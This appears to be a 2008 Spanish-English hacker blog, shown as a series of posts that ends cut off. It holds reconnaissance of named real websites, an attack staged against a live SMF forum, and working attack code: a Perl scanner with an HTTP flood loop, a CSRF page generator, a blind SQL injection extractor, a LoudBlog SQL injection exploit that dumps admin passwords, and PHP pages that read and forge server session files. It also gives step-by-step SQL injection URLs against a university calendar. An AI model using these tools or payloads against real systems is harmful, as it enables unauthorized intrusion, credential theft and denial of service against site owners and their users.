646/tcp filtered unknown
1755/tcp open wms
3128/tcp open squid-http

HTTP Proxy Transparent: www.carlosslim.com:3128
Telnet: www.carlosslim.com:23
Bash History: http://ns6.carlosslim.com/.bash_history

Analizando los DNS:

Xianur0 ~ # dig @ns6.carlosslim.com carlosslim.com ANY ; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com carlosslim.com ANY ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36506 ;; flags: qr aa rd; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 3 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;carlosslim.com. IN ANY ;; ANSWER SECTION: carlosslim.com. 86400 IN A 200.65.129.1 carlosslim.com. 86400 IN A 200.65.0.26 carlosslim.com. 86400 IN SOA ns6.carlosslim.com. dominios.telmex.com. 84 28800 7200 604800 600 carlosslim.com. 86400 IN MX 10 smtp.carlosslim.com. carlosslim.com. 86400 IN NS ns6.carlosslim.com. carlosslim.com. 86400 IN NS ns7.carlosslim.com. ;; ADDITIONAL SECTION: smtp.carlosslim.com. 86400 IN A 200.57.144.18 ns6.carlosslim.com. 86400 IN A 200.57.141.232 ns7.carlosslim.com. 86400 IN A 200.57.141.233 ;; Query time: 73 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 16:51:14 2008 ;; MSG SIZE rcvd: 221

Xianur0 ~ # nc -vv ns6.carlosslim.com 80
DNS fwd/rev mismatch: ns6.carlosslim.com != cust-200-57-141-232.triara.com
ns6.carlosslim.com [200.57.141.232] 80 (http) open
OPTIONS / HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 05 Nov 2008 23:59:31 GMT
Content-length: 0
Content-type: magnus-internal/directory
Allow: HEAD, GET

sent 36, rcvd 167

Xianur0 ~ # nc -vv ns7.carlosslim.com 80
DNS fwd/rev mismatch: ns7.carlosslim.com != cust-200-57-141-233.triara.com
ns7.carlosslim.com [200.57.141.233] 80 (http) open
TRACE / HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Thu, 06 Nov 2008 00:04:44 GMT
Content-length: 37
Content-type: message/http

TRACE / HTTP/1.1
Host: localhost

sent 34, rcvd 174

Xianur0 ~ # dig @ns6.carlosslim.com localhost SOA

; <<>> DiG 9.4.1 <<>> @ns6.carlosslim.com localhost SOA
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16496 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;localhost. IN SOA ;; ANSWER SECTION: localhost. 86400 IN SOA tmpyap01.telmex.com. dominios.telmex.com. 1 28800 7200 604800 3600 ;; AUTHORITY SECTION: localhost. 86400 IN NS ns6.telmex.com. ;; ADDITIONAL SECTION: ns6.telmex.com. 600 IN A 200.57.141.232 ;; Query time: 685 msec ;; SERVER: 200.57.141.232#53(200.57.141.232) ;; WHEN: Wed Nov 5 17:12:21 2008 ;; MSG SIZE rcvd: 125

Busco Gente para Clan bitefight.es

2008-11-07T08:39:00.000-08:00

Hola gente, ya se que es un juego muy friki xD... pero me envicie con el jaja

Servidor: 15
Clan: H.C.
Nombre del Clan: Hijos de Cain

algún interesado?, la entrada es publica xD...

Preparing an attack at an SMF

2008-11-04T08:02:00.000-08:00

Victim: http://www.tinyportalmedia.com
Method: Unsafe handling packages
Used Tool: Tool For SMF Testing By Xianur0

Xianur0 cys # perl smf.pl
Use: smf.pl [option] [Full URL]
Options:
-f Flood
-p Search Directory Setup
-l Installed Mods List
-b Find Temporary

Xianur0 cys # perl smf.pl -p http://www.tinyportalmedia.com/main/
Directory: /home/strzxpz/public_html/main/

Xianur0 cys # perl smf.pl -b http://www.tinyportalmedia.com/main/
Temporary File Found: http://www.tinyportalmedia.com/main//index.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings.php~
Temporary File Found: http://www.tinyportalmedia.com/main//Settings_bak.php~

Settings.php~ and Settings_bak.php~ are few false positives, but index.php~ is correct :) ..

Xianur0 cys # perl smf.pl -l http://www.tinyportalmedia.com/main/
Description: TinyPortal
File: http://www.tinyportalmedia.com/main//Packages/TP_0971.zip
Name: bloc:tinyportal
Version: 1.052

Description: SMF Staff Page
File: http://www.tinyportalmedia.com/main//Packages/staff.zip
Name: vbgamer45:SMFStaff
Version: 1.5.1

Description: Avatar on Member List
File: http://www.tinyportalmedia.com/main//Packages/avmemlist.zip
Name: alm:avonmemberlist
Version: 1.0

Description: Country Flags
File: http://www.tinyportalmedia.com/main//Packages/CountryFlag_1-0-2.tar.gz
Name: jaybachatero:country_flags
Version: 1.0.1

Description: Global Announcements
File: http://www.tinyportalmedia.com/main//Packages/GlobalAnnouncements_1-0_Final.tar.gz
Name: jaybachatero:ga
Version: 1.0

Description: Googlebot & Spiders Mod
File: http://www.tinyportalmedia.com/main//Packages/Googlebot_v2_0_3_only_smf1.1.x.zip
Name: obazavil:googlebot
Version: 2.0.3

Description: K-Detection
File: http://www.tinyportalmedia.com/main//Packages/K_Detection_v2.2.zip
Name: Nikola:K-Detection
Version: 2.2

Description: Karma Blocks Package V.04
File: http://www.tinyportalmedia.com/main//Packages/Karma_Blocks_Package_v0.4.zip
Name: Max:Karmablocks
Version: 0.4

Description: Bear Tabs
File: http://www.tinyportalmedia.com/main//Packages/bear_tabs1.zip
Name: Akulion:BearTabsMod
Version: 1.0

Description: Admin Notepad
File: http://www.tinyportalmedia.com/main//Packages/notepad.zip
Name: vbgamer45:AdminNotepad
Version: 1.0

Description: Member Notepad
File: http://www.tinyportalmedia.com/main//Packages/PersonalPad.zip
Name: vbgamer45:MemberNotepad
Version: 1.0

Description: Profile Comments
File: http://www.tinyportalmedia.com/main//Packages/ProfileComments.zip
Name: vbgamer45:ProfileComments
Version: 1.2.1

Description: Topic Ratings
File: http://www.tinyportalmedia.com/main//Packages/ratings.tar.gz
Name: grudge:ratings
Version: 1.03

Description: Topic Solved
File: http://www.tinyportalmedia.com/main//Packages/tsolved_v1.22.tar.gz
Name: grudge:topic_solved
Version: 1.22

Description: VisualWarning
File: http://www.tinyportalmedia.com/main//Packages/visualwarning132.zip
Name: Grudge:VisualWarning
Version: 1.32

Description: Zodiac_13Moon
File: http://www.tinyportalmedia.com/main//Packages/zodiac_13moon.zip
Name: koji:Zodiac_13Moon
Version: 2.0

Description: Inline Attachments
File: http://www.tinyportalmedia.com/main//Packages/InlineAttachmentMod_FromDonationCoderDotCom.zip
Name: mouser_at_donationcoder.com:inlineattachments
Version: 1.0.4.2

Description: SMFShop
File: http://www.tinyportalmedia.com/main//Packages/SMFShop_3-0_Fresh_Install.zip
Name: daniel15:SMFShop
Version: 3.0

Description: Personal Message Auto Responder
File: http://www.tinyportalmedia.com/main//Packages/pmAutoRespond_V0-2.zip
Name: MikeMill:pmAutoResponder
Version: 0.2

Description: Location Mod - Additional Maps
File: http://www.tinyportalmedia.com/main//Packages/gobalopper.locationmod.additionalmaps.zip
Name: gobalopper:locationmod.additional_maps
Version: 1.2

Description: SMF Gallery Pro
File: http://www.tinyportalmedia.com/main//Packages/smf_gallery_pro.zip
Name: vbgamer45:smfgallerypro
Version: 1.2.2

Description: SMF Gallery Pro Profile Link
File: http://www.tinyportalmedia.com/main//Packages/profilelink.zip
Name: vbgamer45:proprofilelink
Version: 1.0

Description: Welcome Topic Mod
File: http://www.tinyportalmedia.com/main//Packages/93WelcomeTopic.zip
Name: vbgamer45:WelcomeTopic
Version: 1.0

Description: SMF Links
File: http://www.tinyportalmedia.com/main//Packages/26links.zip
Name: vbgamer45:SMFLinks
Version: 1.6.3

Description: SMF Gallery Pro Recent Profile Images
File: http://www.tinyportalmedia.com/main//Packages/profileimages.zip
Name:
Version: 1.0

Description: SMF Gallery Pro Recent Comments Board Index
File: http://www.tinyportalmedia.com/main//Packages/recentcomments.zip
Name: vbgamer45:recentcommentsboardindex
Version: 1.0

Description: SMF Gallery Pro SSI
File: http://www.tinyportalmedia.com/main//Packages/smfgalleryssi.zip
Name: vbgamer45:smfgalleryprossi
Version: 1.1

Description: Enhanced Calendar
File: http://www.tinyportalmedia.com/main//Packages/Calendar_1-1.zip
Name: daniel15:Calendar
Version: 1.1

Description: MySpace Field
File: http://www.tinyportalmedia.com/main//Packages/myspace.zip
Name: snork13:MySpace
Version: 2.4

Description: DeviantART Field
File: http://www.tinyportalmedia.com/main//Packages/deviantART.zip
Name: stormlrd:DeviantART
Version: 1.0

Description: Profile User Action
File: http://www.tinyportalmedia.com/main//Packages/ProfileUserAction_v1.1.zip
Name: Rudolf:profileuseraction
Version: 1.1

Description: Add Custom Modifications to Aero
File: http://www.tinyportalmedia.com/main//Packages/aero.zip
Name: stormlrd:addmodstothemes
Version: 1.0

Description: Signature Dropdown Choices
File: http://www.tinyportalmedia.com/main//Packages/SignatureDropDownsV10.zip
Name: Kays:SignatureDropDowns
Version: 1.0

Description: Merge Double Posts
File: http://www.tinyportalmedia.com/main//Packages/DoublePostMerge107.zip
Name: din1031:DoublePostMerge
Version: 1.0.7

Description: Related Topics
File: http://www.tinyportalmedia.com/main//Packages/related_topics_1.1.1.zip
Name: Niko:RelatedTopic
Version: 1.1.1

Description: SMF Sitemap
File: http://www.tinyportalmedia.com/main//Packages/smf_sitemap_1.1.3.zip
Name: airridetalk:smf_sitemap
Version: 1.1.3

Description: Sci-Fi Avatars
File: http://www.tinyportalmedia.com/main//Packages/SciFi.zip
Name: Brandon:SciFi
Version: 1.0

Description: Google Member Map
File: http://www.tinyportalmedia.com/main//Packages/GoogleMap.template.zip
Name: TLM:GoogleMapsMod
Version: 0.55

Description: SMF 1.0.11 / 1.1.3 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.1.3_1.0.11.tar.gz
Name: smf:smf-1.0.11-1.1.3
Version: 1.1

Description: SMF Gallery Pro Upgrade
File: http://www.tinyportalmedia.com/main//Packages/SMFGalleryUpgrade1.2.2.zip
Name: vbgamer45:smfgalleryproupgrade122
Version: 1.3.21

Description: FelBlog for SMF
File: http://www.tinyportalmedia.com/main//Packages/felblog_940_smf.zip
Name: feline:FelBlog_SMF
Version: 0.941

Description: SMF Trader System
File: http://www.tinyportalmedia.com/main//Packages/12Trader.zip
Name: vbgamer45:SMFTraderSystem
Version: 1.1

Description: SMF 1.0.12 / 1.1.4 / 2.0 b1.1 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.12_1.1.4_2.0.b1.1.tar.gz
Name: smf:smf-1.0.12-1.1.4-2.0.b1.1
Version: 1.0

Description: User Email System
File: http://www.tinyportalmedia.com/main//Packages/useremail.zip
Name: vbgamer45:UserEmailSystem
Version: 1.2

Description: Contact Page
File: http://www.tinyportalmedia.com/main//Packages/contact.zip
Name: vbgamer45:ContactPage
Version: 1.1

Description: Bookmarks
File: http://www.tinyportalmedia.com/main//Packages/bookmarks101.zip
Name: aaronvg:bookmarks
Version: 1.0.1

Description: SMF Classifieds Recent Classifieds Board Index
File: http://www.tinyportalmedia.com/main//Packages/classboardindex.zip
Name: vbgamer45:recentclassboardindex
Version: 1.0

Description: SMF Classifieds
File: http://www.tinyportalmedia.com/main//Packages/SMF_Classifieds_1.0.10.zip
Name: vbgamer45:smfclassifieds
Version: 1.0.10

Description: MessagePreviewOnHover
File: http://www.tinyportalmedia.com/main//Packages/MessagePreviewOnHover.zip
Name: snork13:MessagePreviewOnHover
Version: 1.5

Description: Gallery 2 Integration
File: http://www.tinyportalmedia.com/main//Packages/smf_g2-Beta3.1.tar.gz
Name: Oldiesmann:Gallery2
Version: 1.0beta3.1

Description: SMF Store
File: http://www.tinyportalmedia.com/main//Packages/SMFStore1.2beta.zip
Name: vbgamer45:smfstore
Version: 1.2beta

Description: Add Domaintools to TrackIP
File: http://www.tinyportalmedia.com/main//Packages/domaintools.zip
Name: Marook:TrackIP_Add_Domaintools
Version: 1.0

Description: SMF Gallery Pro Light Box Addon
File: http://www.tinyportalmedia.com/main//Packages/lightbox.zip
Name: vbgamer45:lightbox
Version: 1.1

Description: E-Arcade
File: http://www.tinyportalmedia.com/main//Packages/E-Arcade2.5.0.zip
Name: Eric:Arcade
Version: 2.5.0

Description: SMFChess
File: http://www.tinyportalmedia.com/main//Packages/SMFChess_1.0.zip
Name: Feeble:SMFChess
Version: 1.0

Description: Member Color Link
File: http://www.tinyportalmedia.com/main//Packages/MemberColorLink216.zip
Name: din1031:MemberColorLink
Version: 2.1.6

Description: MCLegendII.2
File: http://www.tinyportalmedia.com/main//Packages/MCLegendII.2.zip
Name: JB:MCLII
Version: 2.0

Description: SMF 1.0.13 / 1.1.5 / 2.0 b3.1 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.13_1.1.5_2.0-b3.1.tar.gz
Name: smf:smf-1.0.13-1.1.5-2.0.b3.1
Version: 1.0

Description: SMF Store Upgrade
File: http://www.tinyportalmedia.com/main//Packages/SMFStore1.2.1upgrade.zip
Name: vbgamer45:smfstoreupgrade
Version: 1.2.4

Description: SMF 1.0.14 / 1.1.6 Update
File: http://www.tinyportalmedia.com/main//Packages/smf_patch_1.0.14-1.1.6_1.zip
Name: smf:smf-1.0.14-1.1.6
Version: 1.0

Now is reviewing the package ... I see at least one with SQL Injection: P. ..

Saludos! :P...
Xianur0 Was Here xD...

Tool For SMF Testing

2008-11-04T07:32:00.000-08:00



#!/usr/bin/perl

# By Xianur0

use LWP::UserAgent;
use Getopt::Std;


my $url = $ARGV[1] || die ("Use: smf.pl [Full URL] [option]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l Installed Mods List \n-b Find Temporary\n");


$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');

      getopts('fplb', \%opt);
      flood() if $opt{f};
      path() if $opt{p};
      list() if $opt{l};
      temp() if $opt{b};

sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,
en;q=0.3');
}

sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
   my $html = $res->content;
   my @htmls = split('Undefined variable: ssi_layers in <b>', $html);
   my @htmls = split('SSI.php</b>', $htmls[1]);
  if($htmls[0] ne "") { print "Directory: $htmls[0]\n"; } else { print "Getting error Directory!\n";}
}
}

sub flood {
print "Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET => $url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "Sent: ".$i."\n";
} else {
print "HTTP Error Query: " . $res->status_line . "\n";
}
}
}


sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
 foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "Temporary File Found: ".$url."/".$temp."\n";
}
}
}

sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
   my $html = $res->content;
my @htmls = split("\n", $html);
 foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "Description: $mod[0]\nFile: $url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";

}
}
}

XSRF Generator By Xianur0

2008-11-01T17:08:00.000-07:00

mmm el hijo prodigio?


#!/usr/bin/perl

#By Xianur0
#uxmal666[at]gmail.com
  use HTML::Parser;
$i = 1;
$b = 1;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
print "\n\n                                       Generador XSRF By Xianur0\n\n\n";

$file = $ARGV[0] || die("Use: xsrf.pl [File]\n");

open(FILE,$file) || die "No pudo abrirse: $!";
while(<FILE>) {
$html.= $_;
}
print "\nBuscando Campos....\n";
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "form") {
$name = $attr->{"name"};
if($name eq "") { $name = "campo" }
$valor = $attr->{"action"};
$metodo = $attr->{"method"};
if($metodo eq "") { $metodo = "GET"}
print "\nFormulario ".$b.": ".$name."=>".$valor."=>".$metodo."\n";
    $form{$b} = [$name, $metodo];
$b++;
}
if($tag =~ "input") {
$name = $attr->{"name"};
$valor = $attr->{"value"};
print "Campo ".$i.": ".$name."=>".$valor."\n";
    $input{$i} = [$name, $valor];
$i++;
}
}
$parser->parse($html);
print "\nTerminado Archivo Parseado!..\n\n";
print "\nEscribe el Formulario a utilizar:\n";
$forma=<STDIN>;
chop($forma);
print "Cuantos Campos(input) utilizara?\n";
$cantidad=<STDIN>;
chop($cantidad);
for($o=1;$o<=$cantidad;$o++)
{
print "Formulario $o?\n";
$inputa=<STDIN>;
chop($inputa);
print "Desea Cambiar el Value? [y/n]\n";
$respuesta=<STDIN>;
chop($respuesta);
if($respuesta eq "y") { 
print "Escriba el Nuevo Valor:\n";
$valu=<STDIN>;
chop($valu);
} else { $valu = $input{$inputa}[1]; }
$campos .='<input type="hidden" name="'.$input{$inputa}[0].'" value="'.$valu.'">';
}
print "Url Submit?\n";
$url=<STDIN>;
chop($url);
print "Generando XSRF Espere Por Favor...\n";
$xsrf = '<html><body><!-- XSRF Generator By Xianur0 -->
<form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
<script>document.'.$form{$forma}[0].'.submit()</script></html></body>';
open(LECTURA,">> xsrf.htm") || die "No pudo abrirse: $!";
print LECTURA $xsrf;
close(LECTURA);
print "\n\nGenerado!: xsrf.html\n\n";

Simplifier Blind SQL Injection By Xianur0

2008-11-01T17:02:00.000-07:00

English: This tool converts Bug Blind SQL Injection in a SQL Injection ordinary and gives you data output that is not limited only to Boolean jaja

Spanish: Esta tool simplemente convierte los bugs Blind SQL Injection en SQL Injection comunes y te da salida de datos que no solo se limitan a booleanos jejejejeje.

Una Obra Maestra :P
A Masterpiece :P


#!/usr/bin/perl

#Xianur0 CYS # perl injector.pl http://www.vuln.com/vuln.php?id=1
#
#Blind SQL Injection converter to SQL Injection
#
#Please Have Patience, running.........
#pma@localhost
#
#
#Finished!
#


# By Xianur0

  use LWP::UserAgent;
$debugmode = "false";
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0] || die("Use: SQL.pl [URI]\nExample: sql.pl http://www.vuln.com/vuln.php?id=1\n");
print "\nBlind SQL Injection converter to SQL Injection By Xianur0\n\n";
print "\nEnter the SQL Injection please:\n";
$sql=<STDIN>;
chop($sql);
print "\nEnter the Detector please:\n";
$detector=<STDIN>;
chop($detector);
print "\nPlease Have Patience, running.........\n";
$caracter = 1;
$i=0;
$simbolo = ">";
while($caracter ne "finito") {
if($debugmode eq "true") { print $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i."\n";}
  $req = HTTP::Request->new(GET => $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
     if($res->content !~ $detector) {
if($base eq $i) { print chr($i); $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
  } else {
     print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
  }
}

print "\nFinished!\n";

[Paper] Insecurity in PHP sessions By Xianur0

2008-10-25T17:22:00.001-07:00

[Paper] Insecurity in PHP sessions By Xianur0

The sessions as its name says are user sessions (contain any information or ID of the user). The sessions being used on a shared server can be very serious security flaws, namely those sessions can be used for certain kinds of attacks, including a data mining (search for useful information) for example, if we go to the temporary directory used by PHP to store sessions (almost always is / tmp /) you can find sessions like this:

user|s:5:"admin";password|s:11:"mipassword";

where is the user name of the first session, 5 is the id and admin is the content, with the same password (second session).

Now we already have a username and a password.

Also, many developers overlook the possibility of Injection data sessions as the example below:

Vulnerable code (PHPNews 1.3):

if((isset($_POST['user']) && isset($_POST['password'])) || (isset($_SESSION['user']) && isset($_SESSION['password'])))
{
if(isset($_SESSION['user']) && isset($_SESSION['password']))
{
$in_user = $_SESSION['user'];
$in_password = $_SESSION['password'];
}
else if(isset($_POST['user']) && isset($_POST['password']))
{
if (!get_magic_quotes_gpc())
{
$in_user = addslashes($_POST['user']);
$in_password = addslashes($_POST['password']);
}
else
{
$in_user = $_POST['user'];
$in_password = $_POST['password'];
}
}

$result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = \'' . $in_user . '\' AND password = password(\'' . $in_password . '\')');
$dbQueries++;
if(mysql_numrows($result) != 0)
{
$auth = true;
$_SESSION['user'] = $in_user;
$_SESSION['password'] = $in_password;
}
else
{
$bad_details = true;
}

Exploit Bypass through sessions:

<?php
session_start();
$_SESSION["user"] = "' OR '1'='1";
$_SESSION["password"] = "') OR ('1'='1";
print "Cookie Master: <br>\nPHPSESSID=".$_COOKIE['PHPSESSID']."<br>\n";
?>

the sessions are not filtered, therefore you can set up these sessions and Injection data, the exploit to schedule (above) only works if the php is using the same route of the sessions that PHPNews.

Although the safemode and this can not be bypassed directories, almost always used the same route on a temporary server for everything. So the sessions can be generated without regard to the security mechanisms that are used (enjoyable clear change the temporary directory to a free reading by another user on the same server and is completely filtering the sessions).

But can be read by the sessions that are held as temporary files and directories that time spent almost always reading for all users of that server.

You can also obtain the content of the sessions when you can not read the files directly:

<?php
@session_start();
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
?>

PHP opens the temporary directory of sessions with the call to the global variable $_SESSION (that is not filtered in safemode), so we give the value of the sessions (the code that travels the HTTP is only a reference to the file session on the server) whatever the domain (you can specify the directory of sessions with the function session_save_path()).

I wrote a tool to automate this process:

http://xianur0.blogspot.com/2008/10/session-master-by-xianur0.html

Session Master By Xianur0

2008-10-25T16:55:00.000-07:00


<html><title>Session Master By Xianur0</title><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center>
<h1>Session Master By Xianur0</h1><br><img alt height="100" src="http://img59.imageshack.us/img59/9729/xianur0oq5.gif" width="100"><br><br><script type="text/Javascript">function expandcollapse (postid) { whichpost = document.getElementById(postid);if (whichpost.className=="postshown") { whichpost.className="posthidden"; } else { whichpost.className="postshown"; } }</script><style>.posthidden {display:none} .postshown {display:inline}</style>


<?php
@session_start();
function buscar() {
$tmp = @session_save_path();
print "<b>Directory of sessions: $tmp\n</b><br>";
$dir = @opendir($tmp);
while ($session = @readdir($dir))
{
if(eregi("sess_",$session)) {
$gestor = @fopen("$tmp/$session", "r");
$contenido = @fread($gestor, filesize("$tmp/$session"));
$contenido = @eregi_replace(';', ";\n<br><br>Session: ", $contenido);
fclose($gestor);
echo "<br>".$session."<br>\n";
$i++;
echo '<a href="javascript:expandcollapse('.$i.')">Show/Hide Code</a><br><span class="posthidden" id="'.$i.'">
<br/><table height=1 cellSpacing=0 cellPadding=5 width="100%" bgColor=#FF0000 borderColor=#FF0000 border=1><tr><th>Session: '.$contenido.'</th></tr></table></span><br>';
}
}}
function definir() {
$name = $_POST['name'];
$contenido = $_POST['valor'];
$_SESSION[$name] = $contenido;
}

function definidos() {
foreach ($_SESSION as $name => $valor)
{
print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
}
}

function menu() {
$uri = $_SERVER['REQUEST_URI'];
print "<h2>Define SESSION</h2><br><form action='".$uri."?&action=definir' method='POST'>Name: <input type='text' name='name'><br>Value: <input type='text' name='valor'><br><input type='submit' value='Set!'></form><h2>Information:</h2><b><a href='$uri?&action=definidos'>Defined Sessions</a><br><a href='$uri?&action=buscar'>Sessions On The Server</a><b>";
}

$action = $_GET['action'];


switch ($action) {
    case buscar:
        buscar();
        break;
    case definir:
        definir();
        break;
    case definidos:
        definidos();
        break;
    default:
        menu();
        break;
}

?>

LoudBlog SQL Injection Exploit All Versions

2008-10-22T14:30:00.001-07:00

This Exploit requires a valid user name and password of an account regardless of the permissions

Author: Xianur0
Affected: All Versions
Bug: SQL Injection

Doorks:
allintext: "powered by LoudBlog"

Exploit:


#!/usr/bin/perl

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);
$ua = LWP::UserAgent->new;

print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
$md5 = md5_hex($ARGV[2]).":".md5_hex($password);

my $req = POST $uri.'/loudblog/ajax.php',
              [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
$req->header('Cookie' => 'lbauth='.$md5);
$res = $ua->request($req);
print $res->content."\n";

Bug:



 //which row do we manipulate?
 $rowpick = "";
 if (isset($p['rowpick'])) $rowpick = $p['rowpick'];
 $rowval = "";
 if (isset($p['rowval'])) $rowval = $p['rowval'];
 
 
 //which column do we manipulate or read?
 $colpick = "";
 if (isset($p['colpick'])) $colpick = $p['colpick'];
 $colval = "";
 if (isset($p['colval'])) $colval = $p['colval'];
 if (isset($p['makehtml'])) $colval = makehtml($p['colval']);
 
 
 // do the request action!!
 
 if ($p['action'] == "singleread") {
  $dosql = "SELECT ".$colpick." FROM ". $table." WHERE ".$rowpick." = '".$rowval."'";
  $return = $GLOBALS['lbdata']->GetArray($dosql);
  echo $return[0][$colpick];

Princeton Blind SQL Injection

2008-10-20T18:01:00.000-07:00

Reporte el bug al admin, y le prometí que no lo diría hasta haberlo corregido:

http://calendar.astro.princeton.edu/mrbs/

(metan en google la búsqueda: astro.princeton.edu/mrbs
y verán que CMs usaba jejeje)

Mensaje:

Good evening, my nickname is Xianur0, I write about and reported security flaws in its system, to begin a Blind SQL Injection (do not authorized to consult your SQL system (MySQL)) for example:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=109
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),2,1))=114
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),3,1))=98
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),4,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),5,1))=64
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),6,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),7,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),8,1))=99
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),9,1))=97
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),10,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),11,1))=104
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),12,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),13,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),14,1))=116

By making a SQL incorrect table stays empty rooms or with a single element, to be correct these consultations, the table shows all the rooms.

Sorting the results in ASCII:
109,114,98,115,64,108,111,99,97,108,104,111,115,116

and translate them into a readable string, we get:
mrbs@localhost

Which is the user of MySQL used by the system, now we made another inquiry to identify which tables are permitted for that user in MySQL:
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (*) FROM INFORMATION_SCHEMA.TABLES)
There database: INFORMATION_SCHEMA and table: tables, this database contains information on the MySQL (for example: tables, columns, etc.), we now how many databases that are in mysql:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES) = 20

This means that there are 20 databases recorded in the INFORMATION_SCHEMA, and if we keep the first step (to which we obtained the user can obtain the structure of the system, users obtain and carry out an attack on the system).

Profile: http://milw0rm.com/author/1657
Nick: Xianur0
Web: http://xianur0.blogspot.com
Email: uxmal666@gmail.com

Sorry For My Bad English

bueno el mensaje sirve como ejemplo de Blind SQL Injection manual xD...

jeje hasta los grandes tienen sus malos momentos...

Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit

2008-10-19T15:41:00.000-07:00



#!/usr/bin/perl

#Vivvo CMS Destroyer
